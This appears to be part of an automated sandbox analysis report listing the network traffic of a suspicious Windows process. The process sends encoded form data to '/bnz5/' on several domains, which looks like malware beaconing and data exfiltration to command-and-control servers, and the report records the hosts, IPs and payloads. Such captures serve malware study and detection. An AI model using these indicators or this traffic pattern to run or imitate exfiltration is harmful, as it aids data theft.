                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      7192.168.2.54972591.195.240.117802940C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Apr 16, 2024 11:59:58.824157953 CEST1770OUTPOST /bnz5/ HTTP/1.1
                                                                                                      Host: www.collegeclubapparel.com
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 1239
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.collegeclubapparel.com
                                                                                                      Referer: http://www.collegeclubapparel.com/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Raw: 67 72 3d 70 39 5a 43 55 71 4b 67 50 69 4e 56 6a 58 53 66 6a 47 76 44 71 34 2b 68 31 6e 51 47 4e 68 33 4f 56 58 76 33 53 78 77 6c 4e 4e 70 74 68 66 79 78 30 2f 75 51 6b 4a 4a 57 56 7a 47 79 55 53 66 67 51 4d 58 43 33 64 6e 45 34 52 48 66 2b 75 55 53 65 68 49 38 36 37 71 63 71 4c 73 62 72 41 2b 52 7a 69 58 59 36 77 56 48 73 4c 6e 62 67 63 74 4d 2b 6e 68 70 32 64 5a 48 65 33 32 67 65 32 46 6b 39 49 53 65 51 37 44 52 51 67 4c 62 73 31 72 79 61 34 32 6d 53 44 6d 54 62 44 4b 61 6c 72 58 4f 48 54 5a 6c 52 34 47 69 67 7a 44 56 43 6c 55 4f 2f 74 46 59 48 66 6d 35 35 46 37 69 58 4c 41 6f 32 70 4a 71 71 4a 31 7a 74 51 5a 37 70 6f 73 67 49 51 4b 71 4a 34 6e 6c 77 65 4d 70 6b 46 5a 31 44 44 61 37 38 2b 37 50 63 38 33 74 71 4f 68 75 77 33 32 4b 73 34 45 6c 77 77 6b 4e 78 78 65 46 52 65 70 4a 4d 74 6c 65 4d 62 53 38 38 48 6d 6b 6a 34 38 70 50 4c 64 68 70 69 68 58 52 50 73 61 54 38 36 79 41 42 72 62 56 4a 38 77 53 36 50 66 74 62 49 37 53 38 39 53 50 37 57 46 58 54 4d 69 46 77 2f 72 6a 59 52 46 62 4e 45 6b 35 66 30 4f 67 32 36 33 49 6c 2f 66 4f 58 31 5a 43 6d 69 56 62 2b 38 34 30 54 34 57 73 33 61 66 67 5a 59 6c 47 50 6c 32 55 75 76 68 36 36 36 49 50 33 78 79 70 4c 34 47 33 2f 65 52 57 72 41 37 73 64 74 71 6c 4e 4b 69 35 51 59 58 66 64 65 69 59 57 78 69 38 62 65 75 6a 76 44 49 38 6a 67 4a 50 4a 73 59 49 31 79 44 63 6c 2f 73 59 74 64 52 52 43 44 45 39 57 47 62 73 37 66 52 77 59 7a 6c 75 48 49 42 57 52 41 77 2b 4f 2b 44 74 70 73 78 47 76 36 6c 57 76 48 48 70 76 6b 2b 6c 31 42 64 79 70 4a 54 36 4a 54 42 51 43 57 65 41 59 6f 2f 66 6d 6a 6e 44 49 74 58 37 6a 61 58 6b 4e 69 42 49 7a 49 30 78 2f 6a 36 59 34 74 6a 68 75 57 4a 4b 38 55 46 2b 4c 2b 59 4a 4d 77 4a 41 4d 33 45 64 69 72 4e 5a 54 6a 62 59 37 62 4f 35 73 66 48 43 4c 69 46 67 7a 77 6d 39 49 54 2f 31 51 41 34 33 30 47 74 6c 47 67 30 68 55 51 67 2f 33 56 62 46 35 43 2b 44 66 54 78 36 43 71 6d 30 32 2f 74 61 62 45 78 41 49 35 6a 53 2b 64 69 67 41 4a 41 4f 65 41 36 33 56 54 67 4e 79 78 4a 2f 59 38 73 66 50 36 36 75 59 4a 42 68 4e 76 56 38 77 71 4c 2f 59 2b 41 32 4a 4b 4b 49 58 45 63 70 46 43 74 56 4e 6a 72 71 39 6a 71 6b 51 6f 64 6c 6e 6e 6d 45 69 36 46 52 53 67 78 76 44 53 65 42 55 43 6c 77 6a 37 30 44 2b 34 47 43 54 41 6d 69 33 76 71 58 6d 6c 73 35 50 41 63 4a 72 6d 4b 4a 41 73 31 53 51 34 54 75 7a 52 5a 75 55 54 56 49 49 56 63 58 42 47 69 77 58 33 43 46 74 76 4b 35 75 6b 37 6f 74 68 48 68 6e 65 71 6c 69 54 58 6d 33 53 2b 30 54 75 64 69 61 72 55 67 4e 37 65 59 5a 4b 6e 53 73 32 41 73 71 62 79 47 41 53 49 73 63 6c 43 54 6f 6c 34 4c 6f 37 49 2f 67 42 74 74 71 34 53 4c 63 2b 78 4c 6c 76 44 76 56 52 69 4b 69 54 46 2f 55 39 32 36 6f 32 46 42 4b 57 70 71 7a 30 69 54 55 42 57 63 41 56 49 70 42 6e 4c 77 71 37 35 35 37 62 46 6d 4f 2f 53 73 37 33 4a 70 65 37 50 68 59 63 34 73 62 65 38 6d 45 37 71 77 45 54 6c 43 51 53 50 52 65 4a 78 33 50 35 7a 2b 45 65 66 41 68 42 49 37 30 79 74 61 6c 35 5a 63 4f 44 35 39 39 6c 6e 4e 74 74 76 64 6a 48 32 4d 76 52 35 4d 5a 65 6f 66 76 64 66 6d 30 50 4e 55 48 35 32 35 4e 6b 6d 57 52 6d 6d 50 32 4b 4b 74 47 63 65 52 79 32 48 42 74 64 51 4b 78 34 36 55 79 62 61 54 43 2b 2b 31 37 54 41 4f 47 34 64 69 63 6c 4b 64 68 64 6d 70 4b 7a 62 55 32 64 4d 39 51 51 77 4e 34 66 48 4f 59 73 30 6e 78 6b 68 58 49 52 42 57 66 58 56 33 63 67 34 6e 6e 76 55 7a 49 42 65 49 35 59 58 48 78 54 34 58 46 74 62 30 4e 53 57 73 6c 75 73 66 75 71 6f 50 6f 69 4d 66 6f 2f 61 34 7a 50 57 58 44 61 6d 59 62 39 78 65 6a 36 4f 4c 4e 6e 57 57 52 71 51 41 30 75 6c 72 5a 34 71 73 70 50 69 58 2b 67 44 76 4e 4b 2f 72 4f 34 31 46 4d 5a 39 75 4e 36 55 68 59 4b 49 4c 6e 50 4b 6c 36 54 6c 31 51 54 68 43 6e 32 7a 59 4f 70 6a 42 73 79 73 2f 6f 54 34 65 30 48 78 52 64 35 4d 75 31 37 35 54 79 53 32 65 71 44 39 4e 4d 52 61 76 75 4b 4e 48 67 3d 3d
                                                                                                      Data Ascii: gr=p9ZCUqKgPiNVjXSfjGvDq4+h1nQGNh3OVXv3SxwlNNpthfyx0/uQkJJWVzGyUSfgQMXC3dnE4RHf+uUSehI867qcqLsbrA+RziXY6wVHsLnbgctM+nhp2dZHe32ge2Fk9ISeQ7DRQgLbs1rya42mSDmTbDKalrXOHTZlR4GigzDVClUO/tFYHfm55F7iXLAo2pJqqJ1ztQZ7posgIQKqJ4nlweMpkFZ1DDa78+7Pc83tqOhuw32Ks4ElwwkNxxeFRepJMtleMbS88Hmkj48pPLdhpihXRPsaT86yABrbVJ8wS6PftbI7S89SP7WFXTMiFw/rjYRFbNEk5f0Og263Il/fOX1ZCmiVb+840T4Ws3afgZYlGPl2Uuvh666IP3xypL4G3/eRWrA7sdtqlNKi5QYXfdeiYWxi8beujvDI8jgJPJsYI1yDcl/sYtdRRCDE9WGbs7fRwYzluHIBWRAw+O+DtpsxGv6lWvHHpvk+l1BdypJT6JTBQCWeAYo/fmjnDItX7jaXkNiBIzI0x/j6Y4tjhuWJK8UF+L+YJMwJAM3EdirNZTjbY7bO5sfHCLiFgzwm9IT/1QA430GtlGg0hUQg/3VbF5C+DfTx6Cqm02/tabExAI5jS+digAJAOeA63VTgNyxJ/Y8sfP66uYJBhNvV8wqL/Y+A2JKKIXEcpFCtVNjrq9jqkQodlnnmEi6FRSgxvDSeBUClwj70D+4GCTAmi3vqXmls5PAcJrmKJAs1SQ4TuzRZuUTVIIVcXBGiwX3CFtvK5uk7othHhneqliTXm3S+0TudiarUgN7eYZKnSs2AsqbyGASIsclCTol4Lo7I/gBttq4SLc+xLlvDvVRiKiTF/U926o2FBKWpqz0iTUBWcAVIpBnLwq7557bFmO/Ss73Jpe7PhYc4sbe8mE7qwETlCQSPReJx3P5z+EefAhBI70ytal5ZcOD599lnNttvdjH2MvR5MZeofvdfm0PNUH525NkmWRmmP2KKtGceRy2HBtdQKx46UybaTC++17TAOG4diclKdhdmpKzbU2dM9QQwN4fHOYs0nxkhXIRBWfXV3cg4nnvUzIBeI5YXHxT4XFtb0NSWslusfuqoPoiMfo/a4zPWXDamYb9xej6OLNnWWRqQA0ulrZ4qspPiX+gDvNK/rO41FMZ9uN6UhYKILnPKl6Tl1QThCn2zYOpjBsys/oT4e0HxRd5Mu175TyS2eqD9NMRavuKNHg==
                                                                                                      Apr 16, 2024 11:59:59.039840937 CEST701INHTTP/1.1 405 Not Allowed
                                                                                                      date: Tue, 16 Apr 2024 09:59:58 GMT
                                                                                                      content-type: text/html
                                                                                                      content-length: 556
                                                                                                      server: NginX
                                                                                                      connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      8192.168.2.54972691.195.240.117802940C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Apr 16, 2024 12:00:02.105271101 CEST458OUTGET /bnz5/?kFGTX=Q6OxIXo8tXD&gr=k/xiXeKkElN9lmj7tVr8idaf/wpGLS/XfVixYgRWGr55oYC/zYvRgJVTIR6Icyf7C+fnrNLi6yuD3OJtT3FnzryZpasAqgaz10+v5QpHvKqHjO9njldZ1cZrBWCORkcOsw== HTTP/1.1
                                                                                                      Host: www.collegeclubapparel.com
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Apr 16, 2024 12:00:02.317255974 CEST107INHTTP/1.1 436
                                                                                                      date: Tue, 16 Apr 2024 10:00:02 GMT
                                                                                                      content-length: 0
                                                                                                      server: NginX
                                                                                                      connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      9192.168.2.54972743.132.191.179802940C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Apr 16, 2024 12:00:08.506663084 CEST712OUTPOST /bnz5/ HTTP/1.1
                                                                                                      Host: www.vvbgsekbo.store
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 203
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.vvbgsekbo.store
                                                                                                      Referer: http://www.vvbgsekbo.store/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Raw: 67 72 3d 45 37 45 39 6b 50 6f 46 7a 37 6a 39 6b 4c 63 30 65 52 34 50 70 75 33 30 4a 4b 38 6f 42 53 71 46 77 44 62 61 56 4a 2b 61 65 6c 55 58 71 36 44 62 38 44 7a 6d 64 57 30 61 48 73 52 71 4d 64 6d 32 4d 4a 6f 44 57 74 2b 53 70 75 50 33 6d 70 79 6b 30 65 36 74 64 61 2b 46 52 74 2f 4b 7a 79 73 43 45 42 62 48 36 7a 63 4d 41 68 6e 30 31 45 31 61 76 6d 4a 62 43 71 57 73 4c 46 50 31 66 46 35 69 79 4e 35 76 48 79 56 6e 6e 37 31 53 2b 38 63 56 33 68 38 63 68 50 34 70 6a 67 68 51 78 50 74 33 51 50 77 79 48 73 75 73 2b 73 44 62 53 79 47 4c 33 61 55 79 34 49 47 58 41 58 41 36 77 69 71 66 66 2b 37 76 53 32 63 3d
                                                                                                      Data Ascii: gr=E7E9kPoFz7j9kLc0eR4Ppu30JK8oBSqFwDbaVJ+aelUXq6Db8DzmdW0aHsRqMdm2MJoDWt+SpuP3mpyk0e6tda+FRt/KzysCEBbH6zcMAhn01E1avmJbCqWsLFP1fF5iyN5vHyVnn71S+8cV3h8chP4pjghQxPt3QPwyHsus+sDbSyGL3aUy4IGXAXA6wiqff+7vS2c=
                                                                                                      Apr 16, 2024 12:00:08.866709948 CEST398INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx
                                                                                                      Date: Tue, 16 Apr 2024 10:00:08 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Access-Control-Allow-Origin: *
                                                                                                      Access-Control-Allow-Methods: *
                                                                                                      Access-Control-Allow-Headers: Content-Type,Access-Token,Appid,Secret,Authorization,Token
                                                                                                      Content-Encoding: gzip
                                                                                                      Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 140


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      10192.168.2.54972843.132.191.179802940C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Apr 16, 2024 12:00:11.355138063 CEST732OUTPOST /bnz5/ HTTP/1.1
                                                                                                      Host: www.vvbgsekbo.store
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 223
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.vvbgsekbo.store
                                                                                                      Referer: http://www.vvbgsekbo.store/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Raw: 67 72 3d 45 37 45 39 6b 50 6f 46 7a 37 6a 39 6c 76 59 30 4e 67 34 50 38 65 33 7a 56 36 38 6f 62 69 71 2f 77 44 66 61 56 49 37 43 65 58 41 58 72 65 4c 62 75 79 7a 6d 49 57 30 61 49 4d 52 76 43 39 6d 74 4d 4a 6b 68 57 6f 2b 53 70 76 72 33 6d 6f 43 6b 33 75 47 71 50 61 2b 48 65 4e 2f 4d 33 79 73 43 45 42 62 48 36 79 34 32 41 67 50 30 31 31 46 61 6f 30 78 61 4c 4b 57 72 62 56 50 31 62 46 35 6d 79 4e 35 4e 48 7a 49 41 6e 34 64 53 2b 39 73 56 32 30 49 44 75 50 34 72 2b 77 68 43 32 4b 45 4c 64 35 31 35 4e 38 72 6d 6f 75 62 64 65 6b 72 68 74 34 63 61 72 6f 71 76 51 45 49 4e 68 53 4c 32 46 64 72 66 4d 68 4c 79 4c 64 69 75 79 6f 4c 46 61 42 75 71 4b 32 44 47 69 44 46 6d
                                                                                                      Data Ascii: gr=E7E9kPoFz7j9lvY0Ng4P8e3zV68obiq/wDfaVI7CeXAXreLbuyzmIW0aIMRvC9mtMJkhWo+Spvr3moCk3uGqPa+HeN/M3ysCEBbH6y42AgP011Fao0xaLKWrbVP1bF5myN5NHzIAn4dS+9sV20IDuP4r+whC2KELd515N8rmoubdekrht4caroqvQEINhSL2FdrfMhLyLdiuyoLFaBuqK2DGiDFm
                                                                                                      Apr 16, 2024 12:00:11.710948944 CEST398INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx
                                                                                                      Date: Tue, 16 Apr 2024 10:00:11 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Access-Control-Allow-Origin: *
                                                                                                      Access-Control-Allow-Methods: *
                                                                                                      Access-Control-Allow-Headers: Content-Type,Access-Token,Appid,Secret,Authorization,Token
                                                                                                      Content-Encoding: gzip
                                                                                                      Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 140


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      11192.168.2.54973043.132.191.179802940C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Apr 16, 2024 12:00:14.194952965 CEST1749OUTPOST /bnz5/ HTTP/1.1
                                                                                                      Host: www.vvbgsekbo.store
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 1239
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.vvbgsekbo.store
                                                                                                      Referer: http://www.vvbgsekbo.store/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Raw: 67 72 3d 45 37 45 39 6b 50 6f 46 7a 37 6a 39 6c 76 59 30 4e 67 34 50 38 65 33 7a 56 36 38 6f 62 69 71 2f 77 44 66 61 56 49 37 43 65 58 34 58 71 73 54 62 2f 68 72 6d 61 6d 30 61 42 73 52 75 43 39 6e 2f 4d 4b 55 6c 57 6f 44 6e 70 74 6a 33 6e 4b 61 6b 32 63 69 71 56 4b 2b 48 47 39 2f 4a 7a 79 73 62 45 42 4c 44 36 7a 49 32 41 67 50 30 31 32 4e 61 37 47 4a 61 48 71 57 73 4c 46 50 48 66 46 35 4f 79 4e 78 33 48 7a 38 36 79 5a 39 53 2b 64 38 56 31 47 67 44 6e 50 34 74 39 77 67 52 32 4b 41 75 64 35 41 47 4e 2f 33 49 6f 73 4c 64 65 68 43 47 2b 4b 73 62 79 6f 7a 4c 62 6c 49 2b 36 6b 62 7a 50 75 37 71 41 6a 48 6d 58 70 32 4e 36 38 76 78 59 69 6e 46 56 7a 58 46 6f 45 63 59 34 54 46 44 6f 51 4b 72 4b 48 45 44 41 4b 79 6b 66 4d 58 6b 73 2b 43 57 38 4c 2f 47 61 4b 79 63 69 6b 33 33 58 72 66 74 6f 76 4f 34 65 2f 78 47 78 6e 4a 4c 39 36 50 44 37 75 77 32 4a 78 68 49 6e 47 75 44 34 42 72 77 6c 61 4d 31 4d 33 34 47 43 6c 69 72 66 68 77 35 50 4c 59 6a 6d 35 4e 64 66 54 66 48 62 6b 71 5a 68 71 48 31 4e 54 54 32 7a 68 63 32 55 56 46 70 54 79 51 45 73 2b 5a 69 7a 56 4d 46 53 48 75 58 35 2b 7a 61 2f 44 4d 73 78 54 6a 61 45 78 4b 32 62 51 55 6a 37 76 42 56 66 53 6a 59 76 78 53 65 57 4a 6b 57 59 69 46 37 38 69 66 64 4c 73 41 32 6a 6a 73 76 6f 41 48 41 5a 39 42 41 62 78 39 78 6f 67 73 46 62 55 5a 43 69 45 42 30 6e 2b 32 70 5a 73 54 4f 43 52 4d 44 6f 51 65 7a 45 4e 71 62 46 4f 58 35 44 6a 43 7a 34 48 4b 34 44 39 6f 6c 47 5a 53 6c 44 67 6f 54 6f 78 4b 50 4c 75 49 45 72 6a 75 79 6f 33 77 78 32 6d 65 46 62 41 7a 4e 2b 52 71 41 6c 68 38 53 63 6a 49 43 56 77 55 74 2f 63 51 38 31 4e 35 33 4b 4b 76 36 4e 51 30 2b 7a 65 69 5a 4b 61 6a 77 4b 59 4b 48 61 61 30 75 56 31 58 47 79 49 65 61 68 4e 30 6e 41 42 36 32 38 70 38 2b 63 44 57 58 41 49 70 66 59 66 44 55 31 30 56 44 46 30 48 46 6f 64 48 65 4c 48 42 48 2f 54 4d 6f 78 35 67 47 4a 2b 78 35 46 48 72 4b 55 58 55 62 50 41 37 62 39 59 55 7a 70 58 6a 63 59 78 36 4c 75 42 58 69 78 6d 4f 65 54 48 39 76 6c 32 43 67 2f 37 74 74 41 79 4c 38 52 4e 50 66 30 4e 2b 32 4d 65 6b 73 2b 6b 62 56 6b 47 5a 61 38 48 6e 31 67 5a 58 64 4f 42 66 75 51 2b 37 57 77 72 36 6f 4f 70 39 43 54 6f 30 56 32 41 2b 4d 6b 6a 48 42 35 70 32 66 2f 7a 52 46 58 72 59 68 7a 72 50 6c 72 54 53 65 67 2b 50 4b 4a 79 33 77 36 52 30 77 4b 63 31 36 69 68 6c 67 56 70 36 54 68 44 6b 45 70 6d 4d 2f 47 74 73 67 47 4c 30 58 50 6c 68 71 2f 70 74 6a 77 53 4e 6b 4f 68 44 58 57 4f 72 64 64 62 4d 41 75 55 50 4c 54 6d 51 37 2b 6f 66 6d 68 36 68 44 2b 76 2b 31 5a 49 73 67 77 6c 2f 6d 2f 47 47 6b 70 4b 72 58 4b 5a 70 65 78 53 44 46 6e 4c 32 33 74 6e 58 6b 36 4b 53 44 76 69 5a 6f 67 6e 69 75 76 50 37 64 61 6b 46 59 46 57 6d 36 56 49 30 79 33 4c 42 49 6a 43 37 78 66 43 48 72 44 79 37 31 51 47 4b 4f 6e 48 79 79 68 41 59 52 39 67 62 58 33 54 4e 45 5a 37 78 5a 4d 4e 53 6b 47 70 34 33 6a 35 55 43 6b 57 57 79 64 6c 67 64 6f 58 30 72 4b 6d 47 48 65 42 56 46 63 33 2b 39 34 77 34 33 35 52 41 75 7a 75 63 50 50 71 61 4b 76 48 49 48 78 2b 52 5a 62 56 77 48 57 55 6e 4c 76 59 79 42 6d 48 4f 47 45 57 51 78 75 65 74 50 4a 51 68 38 38 74 4d 38 65 38 43 47 53 37 53 4e 31 63 51 77 53 39 48 30 49 7a 33 4b 46 30 36 62 67 63 38 58 61 53 6d 76 2f 71 32 65 54 55 6d 4e 4d 52 35 54 33 48 6c 5a 2b 36 35 4a 55 2b 62 6b 4b 34 52 48 76 72 4d 6d 78 66 62 6c 62 39 75 58 64 69 47 6b 50 4d 51 42 31 30 38 52 41 73 46 58 61 61 69 4f 77 61 59 4a 77 35 59 49 7a 75 45 79 38 74 66 4f 73 2f 51 4e 6e 61 48 65 65 63 4a 68 78 30 35 41 7a 52 63 4e 69 4d 34 77 55 51 71 34 66 2b 4b 67 78 4c 76 50 42 6f 66 44 56 65 49 32 59 41 66 48 66 62 57 37 44 6a 4f 32 33 41 53 57 53 55 4a 48 34 4d 31 54 41 70 59 2b 4c 56 73 4b 44 50 4e 59 35 75 4d 5a 6d 41 6d 78 63 6d 74 67 50 67 5a 54 44 6c 30 5a 65 5a 65 52 6a 6d 6a 52 33 4f 64 69 70 59 55 69 46 51 3d 3d
                                                                                                      Data Ascii: gr=E7E9kPoFz7j9lvY0Ng4P8e3zV68obiq/wDfaVI7CeX4XqsTb/hrmam0aBsRuC9n/MKUlWoDnptj3nKak2ciqVK+HG9/JzysbEBLD6zI2AgP012Na7GJaHqWsLFPHfF5OyNx3Hz86yZ9S+d8V1GgDnP4t9wgR2KAud5AGN/3IosLdehCG+KsbyozLblI+6kbzPu7qAjHmXp2N68vxYinFVzXFoEcY4TFDoQKrKHEDAKykfMXks+CW8L/GaKycik33XrftovO4e/xGxnJL96PD7uw2JxhInGuD4BrwlaM1M34GClirfhw5PLYjm5NdfTfHbkqZhqH1NTT2zhc2UVFpTyQEs+ZizVMFSHuX5+za/DMsxTjaExK2bQUj7vBVfSjYvxSeWJkWYiF78ifdLsA2jjsvoAHAZ9BAbx9xogsFbUZCiEB0n+2pZsTOCRMDoQezENqbFOX5DjCz4HK4D9olGZSlDgoToxKPLuIErjuyo3wx2meFbAzN+RqAlh8ScjICVwUt/cQ81N53KKv6NQ0+zeiZKajwKYKHaa0uV1XGyIeahN0nAB628p8+cDWXAIpfYfDU10VDF0HFodHeLHBH/TMox5gGJ+x5FHrKUXUbPA7b9YUzpXjcYx6LuBXixmOeTH9vl2Cg/7ttAyL8RNPf0N+2Meks+kbVkGZa8Hn1gZXdOBfuQ+7Wwr6oOp9CTo0V2A+MkjHB5p2f/zRFXrYhzrPlrTSeg+PKJy3w6R0wKc16ihlgVp6ThDkEpmM/GtsgGL0XPlhq/ptjwSNkOhDXWOrddbMAuUPLTmQ7+ofmh6hD+v+1ZIsgwl/m/GGkpKrXKZpexSDFnL23tnXk6KSDviZogniuvP7dakFYFWm6VI0y3LBIjC7xfCHrDy71QGKOnHyyhAYR9gbX3TNEZ7xZMNSkGp43j5UCkWWydlgdoX0rKmGHeBVFc3+94w435RAuzucPPqaKvHIHx+RZbVwHWUnLvYyBmHOGEWQxuetPJQh88tM8e8CGS7SN1cQwS9H0Iz3KF06bgc8XaSmv/q2eTUmNMR5T3HlZ+65JU+bkK4RHvrMmxfblb9uXdiGkPMQB108RAsFXaaiOwaYJw5YIzuEy8tfOs/QNnaHeecJhx05AzRcNiM4wUQq4f+KgxLvPBofDVeI2YAfHfbW7DjO23ASWSUJH4M1TApY+LVsKDPNY5uMZmAmxcmtgPgZTDl0Z